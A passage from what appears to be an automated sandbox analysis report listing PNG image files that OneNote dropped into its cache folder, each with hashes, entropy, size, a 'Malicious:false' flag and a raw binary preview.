                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000U.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000V.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4081
                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000010.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000011.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000012.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13737
                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000013.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2332
                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000014.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11332
                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000015.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000016.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000017.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1570
                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000018.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4490
                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000019.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000001C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
